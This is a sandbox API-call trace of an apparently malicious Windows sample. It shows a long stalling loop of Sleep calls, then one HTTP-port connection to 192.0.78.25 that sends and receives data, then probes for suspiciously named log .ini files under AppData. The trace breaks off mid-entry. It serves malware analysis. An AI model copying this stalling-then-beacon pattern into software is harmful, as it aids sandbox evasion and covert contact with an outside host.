[0215.979] Sleep (dwMilliseconds=0x7d0) [0215.981] Sleep (dwMilliseconds=0x7d0) [0215.982] Sleep (dwMilliseconds=0x7d0) [0215.983] Sleep (dwMilliseconds=0x7d0) [0215.985] Sleep (dwMilliseconds=0x7d0) [0215.986] Sleep (dwMilliseconds=0x7d0) [0215.988] Sleep (dwMilliseconds=0x7d0) [0215.990] Sleep (dwMilliseconds=0x7d0) [0215.992] Sleep (dwMilliseconds=0x7d0) [0215.993] Sleep (dwMilliseconds=0x7d0) [0215.994] Sleep (dwMilliseconds=0x7d0) [0215.996] Sleep (dwMilliseconds=0x7d0) [0215.997] Sleep (dwMilliseconds=0x7d0) [0215.999] Sleep (dwMilliseconds=0x7d0) [0216.000] Sleep (dwMilliseconds=0x7d0) [0216.002] Sleep (dwMilliseconds=0x7d0) [0216.003] Sleep (dwMilliseconds=0x7d0) [0216.005] Sleep (dwMilliseconds=0x7d0) [0216.006] Sleep (dwMilliseconds=0x7d0) [0216.008] Sleep (dwMilliseconds=0x7d0) [0216.009] Sleep (dwMilliseconds=0x7d0) [0216.012] Sleep (dwMilliseconds=0x7d0) [0216.014] Sleep (dwMilliseconds=0x7d0) [0216.015] Sleep (dwMilliseconds=0x7d0) [0216.016] Sleep (dwMilliseconds=0x7d0) [0216.018] Sleep (dwMilliseconds=0x7d0) [0216.019] Sleep (dwMilliseconds=0x7d0) [0216.021] Sleep (dwMilliseconds=0x7d0) [0216.023] Sleep (dwMilliseconds=0x7d0) [0216.026] Sleep (dwMilliseconds=0x7d0) [0216.027] Sleep (dwMilliseconds=0x7d0) [0216.028] Sleep (dwMilliseconds=0x7d0) [0216.030] Sleep (dwMilliseconds=0x7d0) [0216.031] Sleep (dwMilliseconds=0x7d0) [0216.033] Sleep (dwMilliseconds=0x7d0) [0216.034] Sleep (dwMilliseconds=0x7d0) [0216.036] Sleep (dwMilliseconds=0x7d0) [0216.037] Sleep (dwMilliseconds=0x7d0) [0216.039] Sleep (dwMilliseconds=0x7d0) [0216.040] Sleep (dwMilliseconds=0x7d0) [0216.042] Sleep (dwMilliseconds=0x7d0) [0216.043] Sleep (dwMilliseconds=0x7d0) [0216.045] Sleep (dwMilliseconds=0x7d0) [0216.047] Sleep (dwMilliseconds=0x7d0) [0216.048] Sleep (dwMilliseconds=0x7d0) [0216.050] Sleep (dwMilliseconds=0x7d0) [0216.051] Sleep (dwMilliseconds=0x7d0) [0216.053] Sleep (dwMilliseconds=0x7d0) [0216.054] Sleep (dwMilliseconds=0x7d0) [0216.057] Sleep (dwMilliseconds=0x7d0) [0216.058] Sleep (dwMilliseconds=0x7d0) [0216.060] Sleep (dwMilliseconds=0x7d0) [0216.061] Sleep (dwMilliseconds=0x7d0) [0216.063] Sleep (dwMilliseconds=0x7d0) [0216.064] Sleep (dwMilliseconds=0x7d0) [0216.066] Sleep (dwMilliseconds=0x7d0) [0216.068] Sleep (dwMilliseconds=0x7d0) [0216.069] Sleep (dwMilliseconds=0x7d0) [0216.071] Sleep (dwMilliseconds=0x7d0) [0216.072] Sleep (dwMilliseconds=0x7d0) [0216.074] Sleep (dwMilliseconds=0x7d0) [0216.075] Sleep (dwMilliseconds=0x7d0) [0216.077] Sleep (dwMilliseconds=0x7d0) [0216.078] Sleep (dwMilliseconds=0x7d0) [0216.080] Sleep (dwMilliseconds=0x7d0) [0216.081] Sleep (dwMilliseconds=0x7d0) [0216.083] Sleep (dwMilliseconds=0x7d0) [0216.084] Sleep (dwMilliseconds=0x7d0) [0216.086] Sleep (dwMilliseconds=0x7d0) [0216.087] Sleep (dwMilliseconds=0x7d0) [0216.089] Sleep (dwMilliseconds=0x7d0) [0216.092] Sleep (dwMilliseconds=0x7d0) [0216.093] Sleep (dwMilliseconds=0x7d0) [0216.095] Sleep (dwMilliseconds=0x7d0) [0216.096] Sleep (dwMilliseconds=0x7d0) [0216.098] Sleep (dwMilliseconds=0x7d0) [0216.100] Sleep (dwMilliseconds=0x7d0) [0216.102] Sleep (dwMilliseconds=0x7d0) [0216.103] Sleep (dwMilliseconds=0x7d0) [0216.105] Sleep (dwMilliseconds=0x7d0) [0216.106] Sleep (dwMilliseconds=0x7d0) [0216.108] Sleep (dwMilliseconds=0x7d0) [0216.109] Sleep (dwMilliseconds=0x7d0) [0216.111] Sleep (dwMilliseconds=0x7d0) [0216.128] Sleep (dwMilliseconds=0x7d0) [0216.129] Sleep (dwMilliseconds=0x7d0) [0216.131] Sleep (dwMilliseconds=0x7d0) [0216.133] Sleep (dwMilliseconds=0x7d0) [0216.134] Sleep (dwMilliseconds=0x7d0) [0216.136] Sleep (dwMilliseconds=0x7d0) [0216.137] Sleep (dwMilliseconds=0x7d0) [0216.139] Sleep (dwMilliseconds=0x7d0) [0216.140] Sleep (dwMilliseconds=0x7d0) [0216.142] Sleep (dwMilliseconds=0x7d0) [0216.143] Sleep (dwMilliseconds=0x7d0) [0216.145] Sleep (dwMilliseconds=0x7d0) [0216.146] Sleep (dwMilliseconds=0x7d0) [0216.148] Sleep (dwMilliseconds=0x7d0) [0216.149] Sleep (dwMilliseconds=0x7d0) [0216.151] Sleep (dwMilliseconds=0x7d0) [0216.152] Sleep (dwMilliseconds=0x7d0) [0216.154] Sleep (dwMilliseconds=0x7d0) [0216.155] Sleep (dwMilliseconds=0x7d0) [0216.157] Sleep (dwMilliseconds=0x7d0) [0216.158] Sleep (dwMilliseconds=0x7d0) [0216.160] Sleep (dwMilliseconds=0x7d0) [0216.161] Sleep (dwMilliseconds=0x7d0) [0216.163] Sleep (dwMilliseconds=0x7d0) [0216.164] Sleep (dwMilliseconds=0x7d0) [0216.166] Sleep (dwMilliseconds=0x7d0) [0216.167] Sleep (dwMilliseconds=0x7d0) [0216.169] Sleep (dwMilliseconds=0x7d0) [0216.170] Sleep (dwMilliseconds=0x7d0) [0216.172] Sleep (dwMilliseconds=0x7d0) [0216.173] Sleep (dwMilliseconds=0x7d0) [0216.175] Sleep (dwMilliseconds=0x7d0) [0216.177] Sleep (dwMilliseconds=0x7d0) [0216.179] Sleep (dwMilliseconds=0x7d0) [0216.180] Sleep (dwMilliseconds=0x7d0) [0216.182] Sleep (dwMilliseconds=0x7d0) [0216.183] Sleep (dwMilliseconds=0x7d0) [0216.185] Sleep (dwMilliseconds=0x7d0) [0216.186] Sleep (dwMilliseconds=0x7d0) [0216.188] Sleep (dwMilliseconds=0x7d0) [0216.189] Sleep (dwMilliseconds=0x7d0) [0216.191] Sleep (dwMilliseconds=0x7d0) [0216.192] Sleep (dwMilliseconds=0x7d0) [0216.194] Sleep (dwMilliseconds=0x7d0) [0216.195] Sleep (dwMilliseconds=0x7d0) [0216.197] Sleep (dwMilliseconds=0x7d0) [0216.198] Sleep (dwMilliseconds=0x7d0) [0216.200] Sleep (dwMilliseconds=0x7d0) [0216.201] Sleep (dwMilliseconds=0x7d0) [0216.203] Sleep (dwMilliseconds=0x7d0) [0216.204] Sleep (dwMilliseconds=0x7d0) [0216.206] Sleep (dwMilliseconds=0x7d0) [0216.207] Sleep (dwMilliseconds=0x7d0) [0216.209] Sleep (dwMilliseconds=0x7d0) [0216.210] Sleep (dwMilliseconds=0x7d0) [0216.212] Sleep (dwMilliseconds=0x7d0) [0216.213] Sleep (dwMilliseconds=0x7d0) [0216.215] Sleep (dwMilliseconds=0x7d0) [0216.216] Sleep (dwMilliseconds=0x7d0) [0216.218] Sleep (dwMilliseconds=0x7d0) [0216.219] Sleep (dwMilliseconds=0x7d0) [0216.221] Sleep (dwMilliseconds=0x7d0) [0216.222] Sleep (dwMilliseconds=0x7d0) [0216.224] Sleep (dwMilliseconds=0x7d0) [0216.226] Sleep (dwMilliseconds=0x7d0) [0216.227] Sleep (dwMilliseconds=0x7d0) [0216.229] Sleep (dwMilliseconds=0x7d0) [0216.230] Sleep (dwMilliseconds=0x7d0) [0216.232] Sleep (dwMilliseconds=0x7d0) [0216.233] Sleep (dwMilliseconds=0x7d0) [0216.235] Sleep (dwMilliseconds=0x7d0) [0216.236] Sleep (dwMilliseconds=0x7d0) [0216.238] Sleep (dwMilliseconds=0x7d0) [0216.239] Sleep (dwMilliseconds=0x7d0) [0216.241] Sleep (dwMilliseconds=0x7d0) [0216.242] Sleep (dwMilliseconds=0x7d0) [0216.244] Sleep (dwMilliseconds=0x7d0) [0216.245] Sleep (dwMilliseconds=0x7d0) [0216.247] Sleep (dwMilliseconds=0x7d0) [0216.248] Sleep (dwMilliseconds=0x7d0) [0216.250] Sleep (dwMilliseconds=0x7d0) [0216.251] Sleep (dwMilliseconds=0x7d0) [0216.253] Sleep (dwMilliseconds=0x7d0) [0216.255] Sleep (dwMilliseconds=0x7d0) [0216.256] Sleep (dwMilliseconds=0x7d0) [0216.257] Sleep (dwMilliseconds=0x7d0) [0216.259] Sleep (dwMilliseconds=0x7d0) [0216.260] Sleep (dwMilliseconds=0x7d0) [0216.262] Sleep (dwMilliseconds=0x7d0) [0216.263] Sleep (dwMilliseconds=0x7d0) [0216.266] Sleep (dwMilliseconds=0x7d0) [0216.267] Sleep (dwMilliseconds=0x7d0) [0216.269] Sleep (dwMilliseconds=0x7d0) [0216.270] Sleep (dwMilliseconds=0x7d0) [0216.272] Sleep (dwMilliseconds=0x7d0) [0216.273] Sleep (dwMilliseconds=0x7d0) [0216.275] Sleep (dwMilliseconds=0x7d0) [0216.277] Sleep (dwMilliseconds=0x7d0) [0216.278] Sleep (dwMilliseconds=0x7d0) [0216.280] Sleep (dwMilliseconds=0x7d0) [0216.281] Sleep (dwMilliseconds=0x7d0) [0216.283] Sleep (dwMilliseconds=0x7d0) [0216.284] Sleep (dwMilliseconds=0x7d0) [0216.293] Sleep (dwMilliseconds=0x7d0) [0216.296] Sleep (dwMilliseconds=0x7d0) [0216.297] Sleep (dwMilliseconds=0x7d0) [0216.299] Sleep (dwMilliseconds=0x7d0) [0216.300] Sleep (dwMilliseconds=0x7d0) [0216.301] Sleep (dwMilliseconds=0x7d0) [0216.303] Sleep (dwMilliseconds=0x7d0) [0216.305] Sleep (dwMilliseconds=0x7d0) [0216.306] Sleep (dwMilliseconds=0x7d0) [0216.308] Sleep (dwMilliseconds=0x7d0) [0216.309] Sleep (dwMilliseconds=0x7d0) [0216.311] Sleep (dwMilliseconds=0x7d0) [0216.312] Sleep (dwMilliseconds=0x7d0) [0216.314] Sleep (dwMilliseconds=0x7d0) [0216.316] Sleep (dwMilliseconds=0x7d0) [0216.317] Sleep (dwMilliseconds=0x7d0) [0216.318] Sleep (dwMilliseconds=0x7d0) [0216.320] Sleep (dwMilliseconds=0x7d0) [0216.322] Sleep (dwMilliseconds=0x7d0) [0216.324] Sleep (dwMilliseconds=0x7d0) [0216.328] Sleep (dwMilliseconds=0x7d0) [0216.329] Sleep (dwMilliseconds=0x7d0) [0216.331] Sleep (dwMilliseconds=0x7d0) [0216.332] Sleep (dwMilliseconds=0x7d0) [0216.334] Sleep (dwMilliseconds=0x7d0) [0216.335] Sleep (dwMilliseconds=0x7d0) [0216.338] Sleep (dwMilliseconds=0x7d0) [0216.340] Sleep (dwMilliseconds=0x7d0) [0216.342] Sleep (dwMilliseconds=0x7d0) [0216.343] Sleep (dwMilliseconds=0x7d0) [0216.345] Sleep (dwMilliseconds=0x7d0) [0216.346] Sleep (dwMilliseconds=0x7d0) [0216.348] Sleep (dwMilliseconds=0x7d0) [0216.349] Sleep (dwMilliseconds=0x7d0) [0216.351] Sleep (dwMilliseconds=0x7d0) [0216.352] Sleep (dwMilliseconds=0x7d0) [0216.354] Sleep (dwMilliseconds=0x7d0) [0216.355] Sleep (dwMilliseconds=0x7d0) [0216.357] Sleep (dwMilliseconds=0x7d0) [0216.359] Sleep (dwMilliseconds=0x7d0) [0216.360] Sleep (dwMilliseconds=0x7d0) [0216.362] Sleep (dwMilliseconds=0x7d0) [0216.363] Sleep (dwMilliseconds=0x7d0) [0216.365] Sleep (dwMilliseconds=0x7d0) [0216.366] Sleep (dwMilliseconds=0x7d0) [0216.368] Sleep (dwMilliseconds=0x7d0) [0216.371] Sleep (dwMilliseconds=0x7d0) [0216.372] Sleep (dwMilliseconds=0x7d0) [0216.373] Sleep (dwMilliseconds=0x7d0) [0216.375] Sleep (dwMilliseconds=0x7d0) [0216.376] Sleep (dwMilliseconds=0x7d0) [0216.378] Sleep (dwMilliseconds=0x7d0) [0216.380] Sleep (dwMilliseconds=0x7d0) [0216.382] Sleep (dwMilliseconds=0x7d0) [0216.384] Sleep (dwMilliseconds=0x7d0) [0216.385] Sleep (dwMilliseconds=0x7d0) [0216.387] Sleep (dwMilliseconds=0x7d0) [0216.388] Sleep (dwMilliseconds=0x7d0) [0216.389] Sleep (dwMilliseconds=0x7d0) [0216.391] Sleep (dwMilliseconds=0x7d0) [0216.392] Sleep (dwMilliseconds=0x7d0) [0216.394] Sleep (dwMilliseconds=0x7d0) [0216.395] Sleep (dwMilliseconds=0x7d0) [0216.397] Sleep (dwMilliseconds=0x7d0) [0216.398] Sleep (dwMilliseconds=0x7d0) [0216.400] Sleep (dwMilliseconds=0x7d0) [0216.402] Sleep (dwMilliseconds=0x7d0) [0216.403] Sleep (dwMilliseconds=0x7d0) [0216.405] Sleep (dwMilliseconds=0x7d0) [0216.407] Sleep (dwMilliseconds=0x7d0) [0216.408] Sleep (dwMilliseconds=0x7d0) [0216.409] Sleep (dwMilliseconds=0x7d0) [0216.411] Sleep (dwMilliseconds=0x7d0) [0216.414] Sleep (dwMilliseconds=0x7d0) [0216.415] Sleep (dwMilliseconds=0x7d0) [0216.416] Sleep (dwMilliseconds=0x7d0) [0216.418] Sleep (dwMilliseconds=0x7d0) [0216.420] Sleep (dwMilliseconds=0x7d0) [0216.421] Sleep (dwMilliseconds=0x7d0) [0216.423] Sleep (dwMilliseconds=0x7d0) [0216.424] Sleep (dwMilliseconds=0x7d0) [0216.426] Sleep (dwMilliseconds=0x7d0) [0216.428] Sleep (dwMilliseconds=0x7d0) [0216.429] Sleep (dwMilliseconds=0x7d0) [0216.431] Sleep (dwMilliseconds=0x7d0) [0216.432] Sleep (dwMilliseconds=0x7d0) [0216.433] Sleep (dwMilliseconds=0x7d0) [0216.436] Sleep (dwMilliseconds=0x7d0) [0216.437] Sleep (dwMilliseconds=0x7d0) [0216.438] Sleep (dwMilliseconds=0x7d0) [0216.440] Sleep (dwMilliseconds=0x7d0) [0216.441] Sleep (dwMilliseconds=0x7d0) [0216.444] Sleep (dwMilliseconds=0x7d0) [0216.447] Sleep (dwMilliseconds=0x7d0) [0216.448] Sleep (dwMilliseconds=0x7d0) [0216.450] Sleep (dwMilliseconds=0x7d0) [0216.451] Sleep (dwMilliseconds=0x7d0) [0216.453] Sleep (dwMilliseconds=0x7d0) [0216.454] Sleep (dwMilliseconds=0x7d0) [0216.456] Sleep (dwMilliseconds=0x7d0) [0216.459] Sleep (dwMilliseconds=0x7d0) [0216.460] Sleep (dwMilliseconds=0x7d0) [0216.462] Sleep (dwMilliseconds=0x7d0) [0216.463] Sleep (dwMilliseconds=0x7d0) [0216.465] Sleep (dwMilliseconds=0x7d0) [0216.466] Sleep (dwMilliseconds=0x7d0) [0216.468] Sleep (dwMilliseconds=0x7d0) [0216.469] Sleep (dwMilliseconds=0x7d0) [0216.471] Sleep (dwMilliseconds=0x7d0) [0216.472] Sleep (dwMilliseconds=0x7d0) [0216.474] Sleep (dwMilliseconds=0x7d0) [0216.476] Sleep (dwMilliseconds=0x7d0) [0216.477] Sleep (dwMilliseconds=0x7d0) [0216.481] Sleep (dwMilliseconds=0x7d0) [0216.482] Sleep (dwMilliseconds=0x7d0) [0216.484] Sleep (dwMilliseconds=0x7d0) [0216.485] Sleep (dwMilliseconds=0x7d0) [0216.487] Sleep (dwMilliseconds=0x7d0) [0216.488] Sleep (dwMilliseconds=0x7d0) [0216.491] Sleep (dwMilliseconds=0x7d0) [0216.493] Sleep (dwMilliseconds=0x7d0) [0216.494] Sleep (dwMilliseconds=0x7d0) [0216.496] Sleep (dwMilliseconds=0x7d0) [0216.497] Sleep (dwMilliseconds=0x7d0) [0216.499] Sleep (dwMilliseconds=0x7d0) [0216.500] Sleep (dwMilliseconds=0x7d0) [0216.503] Sleep (dwMilliseconds=0x7d0) [0216.504] Sleep (dwMilliseconds=0x7d0) [0216.506] Sleep (dwMilliseconds=0x7d0) [0216.507] Sleep (dwMilliseconds=0x7d0) [0216.509] Sleep (dwMilliseconds=0x7d0) [0216.510] Sleep (dwMilliseconds=0x7d0) [0216.512] Sleep (dwMilliseconds=0x7d0) [0216.513] Sleep (dwMilliseconds=0x7d0) [0216.515] Sleep (dwMilliseconds=0x7d0) [0216.516] Sleep (dwMilliseconds=0x7d0) [0216.518] Sleep (dwMilliseconds=0x7d0) [0216.519] Sleep (dwMilliseconds=0x7d0) [0216.521] Sleep (dwMilliseconds=0x7d0) [0216.524] Sleep (dwMilliseconds=0x7d0) [0216.527] Sleep (dwMilliseconds=0x7d0) [0216.528] Sleep (dwMilliseconds=0x7d0) [0216.530] Sleep (dwMilliseconds=0x7d0) [0216.531] Sleep (dwMilliseconds=0x7d0) [0216.533] Sleep (dwMilliseconds=0x7d0) [0216.535] Sleep (dwMilliseconds=0x7d0) [0216.537] Sleep (dwMilliseconds=0x7d0) [0216.538] Sleep (dwMilliseconds=0x7d0) [0216.540] Sleep (dwMilliseconds=0x7d0) [0216.541] Sleep (dwMilliseconds=0x7d0) [0216.543] Sleep (dwMilliseconds=0x7d0) [0216.544] Sleep (dwMilliseconds=0x7d0) [0216.547] Sleep (dwMilliseconds=0x7d0) [0216.548] Sleep (dwMilliseconds=0x7d0) [0216.550] Sleep (dwMilliseconds=0x7d0) [0216.551] Sleep (dwMilliseconds=0x7d0) [0216.553] Sleep (dwMilliseconds=0x7d0) [0216.554] Sleep (dwMilliseconds=0x7d0) [0216.556] Sleep (dwMilliseconds=0x7d0) [0216.557] Sleep (dwMilliseconds=0x7d0) [0216.559] Sleep (dwMilliseconds=0x7d0) [0216.560] Sleep (dwMilliseconds=0x7d0) [0216.562] Sleep (dwMilliseconds=0x7d0) [0216.586] Sleep (dwMilliseconds=0x7d0) [0216.588] Sleep (dwMilliseconds=0x7d0) [0216.590] Sleep (dwMilliseconds=0x7d0) [0216.591] Sleep (dwMilliseconds=0x7d0) [0216.593] Sleep (dwMilliseconds=0x7d0) [0216.594] Sleep (dwMilliseconds=0x7d0) [0216.596] Sleep (dwMilliseconds=0x7d0) [0216.597] Sleep (dwMilliseconds=0x7d0) [0216.599] Sleep (dwMilliseconds=0x7d0) [0216.603] Sleep (dwMilliseconds=0x7d0) [0216.604] Sleep (dwMilliseconds=0x7d0) [0216.605] Sleep (dwMilliseconds=0x7d0) [0216.607] Sleep (dwMilliseconds=0x7d0) [0216.608] Sleep (dwMilliseconds=0x7d0) [0216.611] Sleep (dwMilliseconds=0x7d0) [0216.613] Sleep (dwMilliseconds=0x7d0) [0216.614] Sleep (dwMilliseconds=0x7d0) [0216.616] Sleep (dwMilliseconds=0x7d0) [0216.618] Sleep (dwMilliseconds=0x7d0) [0216.619] Sleep (dwMilliseconds=0x7d0) [0216.620] Sleep (dwMilliseconds=0x7d0) [0216.623] Sleep (dwMilliseconds=0x7d0) [0216.624] Sleep (dwMilliseconds=0x7d0) [0216.662] Sleep (dwMilliseconds=0x7d0) [0216.664] Sleep (dwMilliseconds=0x7d0) [0216.666] Sleep (dwMilliseconds=0x7d0) [0216.667] Sleep (dwMilliseconds=0x7d0) [0216.669] Sleep (dwMilliseconds=0x7d0) [0216.670] Sleep (dwMilliseconds=0x7d0) [0216.672] Sleep (dwMilliseconds=0x7d0) [0216.673] Sleep (dwMilliseconds=0x7d0) [0216.675] Sleep (dwMilliseconds=0x7d0) [0216.676] Sleep (dwMilliseconds=0x7d0) [0216.678] Sleep (dwMilliseconds=0x7d0) [0216.680] Sleep (dwMilliseconds=0x7d0) [0216.681] Sleep (dwMilliseconds=0x7d0) [0216.682] Sleep (dwMilliseconds=0x7d0) [0216.684] Sleep (dwMilliseconds=0x7d0) [0216.685] Sleep (dwMilliseconds=0x7d0) [0216.688] Sleep (dwMilliseconds=0x7d0) [0216.690] Sleep (dwMilliseconds=0x7d0) [0216.692] Sleep (dwMilliseconds=0x7d0) [0216.693] Sleep (dwMilliseconds=0x7d0) [0216.695] Sleep (dwMilliseconds=0x7d0) [0216.696] Sleep (dwMilliseconds=0x7d0) [0216.698] Sleep (dwMilliseconds=0x7d0) [0216.700] Sleep (dwMilliseconds=0x7d0) [0216.702] Sleep (dwMilliseconds=0x7d0) [0216.703] Sleep (dwMilliseconds=0x7d0) [0216.705] Sleep (dwMilliseconds=0x7d0) [0216.706] Sleep (dwMilliseconds=0x7d0) [0216.708] Sleep (dwMilliseconds=0x7d0) [0216.709] Sleep (dwMilliseconds=0x7d0) [0216.712] Sleep (dwMilliseconds=0x7d0) [0216.713] Sleep (dwMilliseconds=0x7d0) [0216.715] Sleep (dwMilliseconds=0x7d0) [0216.716] Sleep (dwMilliseconds=0x7d0) [0216.718] Sleep (dwMilliseconds=0x7d0) [0216.719] Sleep (dwMilliseconds=0x7d0) [0216.721] Sleep (dwMilliseconds=0x7d0) [0216.722] Sleep (dwMilliseconds=0x7d0) [0216.724] Sleep (dwMilliseconds=0x7d0) [0216.726] Sleep (dwMilliseconds=0x7d0) [0216.728] Sleep (dwMilliseconds=0x7d0) [0216.729] Sleep (dwMilliseconds=0x7d0) [0216.731] Sleep (dwMilliseconds=0x7d0) [0216.733] Sleep (dwMilliseconds=0x7d0) [0216.735] Sleep (dwMilliseconds=0x7d0) [0216.736] Sleep (dwMilliseconds=0x7d0) [0216.738] Sleep (dwMilliseconds=0x7d0) [0216.739] Sleep (dwMilliseconds=0x7d0) [0216.741] Sleep (dwMilliseconds=0x7d0) [0216.742] Sleep (dwMilliseconds=0x7d0) [0216.744] Sleep (dwMilliseconds=0x7d0) [0216.745] Sleep (dwMilliseconds=0x7d0) [0216.747] Sleep (dwMilliseconds=0x7d0) [0216.749] Sleep (dwMilliseconds=0x7d0) [0216.750] Sleep (dwMilliseconds=0x7d0) [0216.752] Sleep (dwMilliseconds=0x7d0) [0216.753] Sleep (dwMilliseconds=0x7d0) [0216.764] Sleep (dwMilliseconds=0x7d0) [0216.766] Sleep (dwMilliseconds=0x7d0) [0216.767] Sleep (dwMilliseconds=0x7d0) [0216.769] Sleep (dwMilliseconds=0x7d0) [0216.771] Sleep (dwMilliseconds=0x7d0) [0216.773] Sleep (dwMilliseconds=0x7d0) [0216.774] Sleep (dwMilliseconds=0x7d0) [0216.776] Sleep (dwMilliseconds=0x7d0) [0216.778] Sleep (dwMilliseconds=0x7d0) [0216.779] Sleep (dwMilliseconds=0x7d0) [0216.781] Sleep (dwMilliseconds=0x7d0) [0216.782] Sleep (dwMilliseconds=0x7d0) [0216.784] Sleep (dwMilliseconds=0x7d0) [0216.785] Sleep (dwMilliseconds=0x7d0) [0216.787] Sleep (dwMilliseconds=0x7d0) [0216.788] Sleep (dwMilliseconds=0x7d0) [0216.789] Sleep (dwMilliseconds=0x7d0) [0216.791] Sleep (dwMilliseconds=0x7d0) [0216.792] Sleep (dwMilliseconds=0x7d0) [0216.794] Sleep (dwMilliseconds=0x7d0) [0216.795] Sleep (dwMilliseconds=0x7d0) [0216.797] Sleep (dwMilliseconds=0x7d0) [0216.798] Sleep (dwMilliseconds=0x7d0) [0216.800] Sleep (dwMilliseconds=0x7d0) [0216.801] Sleep (dwMilliseconds=0x7d0) [0217.175] Sleep (dwMilliseconds=0x7d0) [0217.461] socket (af=2, type=1, protocol=6) returned 0x1b08 [0217.461] connect (s=0x1b08, name=0x9f929d0*(sa_family=2, sin_port=0x50, sin_addr="192.0.78.25"), namelen=16) returned 0 [0217.479] send (s=0x1b08, buf=0x82e10fa*, len=171, flags=0) returned 171 [0217.479] setsockopt (s=0x1b08, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0217.479] recv (in: s=0x1b08, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 472 [0217.527] closesocket (s=0x1b08) returned 0 [0217.529] Sleep (dwMilliseconds=0x7d0) [0217.530] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0217.530] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0217.530] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0217.530] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9480) returned 1 [0217.530] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0217.531] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0217.531] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0217.531] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f76b0) returned 1 [0217.531] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0217.531] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0217.531] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0217.531] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9480) returned 1 [0217.531] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0217.531] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: 